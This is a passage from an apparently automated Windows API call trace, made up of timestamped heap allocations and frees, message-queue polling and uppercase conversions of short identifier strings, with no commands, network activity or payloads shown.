hHeap=0x25c0000) returned 1 [0188.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0188.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0188.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0188.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0188.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0188.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0188.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0188.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0188.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.624] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0188.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0188.625] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0188.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0188.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0188.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.625] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0188.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0188.625] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0188.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0188.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0188.626] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.626] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0188.626] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0188.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0188.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.626] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.626] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0188.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0188.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.627] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.627] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0188.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0188.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0188.629] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.629] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.629] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0188.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.629] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0188.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.629] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0188.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.630] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0188.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.630] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0188.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0188.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.631] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.631] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.631] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0188.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.631] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0188.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0188.634] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.634] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0188.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0188.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.634] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.634] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0188.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0188.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.634] HeapFree (in: hHeap=0x25c0000, 